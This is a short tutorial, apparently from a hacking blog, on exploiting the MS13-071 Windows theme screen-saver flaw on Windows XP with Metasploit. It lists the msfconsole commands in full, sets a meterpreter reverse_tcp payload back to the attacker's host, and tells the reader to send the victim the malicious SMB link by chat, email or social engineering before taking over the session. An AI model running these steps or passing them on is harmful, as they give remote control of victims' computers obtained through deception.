This Metasploit module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the “Screen Saver” tab is viewed.

Exploit Targets

Windows XP SP 3

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/ms13_071_theme

msf exploit (ms13_071_theme)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms13_071_theme)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (ms13_071_theme)>set srvhost 192.168.1.3

msf exploit (ms13_071_theme)>exploit

Now an URL you should give to your victim \192.168.1.3:gCzJXDKtJugDsVFC.scr via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“